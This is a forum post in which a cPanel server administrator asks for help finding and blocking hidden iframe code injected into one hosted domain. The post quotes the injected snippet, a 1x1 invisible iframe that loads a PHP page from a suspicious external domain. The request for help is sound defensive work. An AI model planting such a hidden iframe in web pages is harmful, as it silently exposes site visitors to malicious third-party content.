Hello, It seems that one domain at a cpanel server has been inyected with some iframe code... the problem seems to be that we can not find the iframe code anywhere in the public_html directory. We already scanned the site public_html directory trying to find the js file or something that can launch the iframe but it seems to be impossible to find, also ran clamscanner in the fold without sucess. I was thinking about some mod_security rule to block iframe js attacks, does anybody know about this? This is a RHE 4 + cPanel server, any help is appreciated. This is the iframe code: Code: iframe width=1 height=1 src='http://x4iomu.wanna.somepills.in/images/enter.php?n2' Thanks.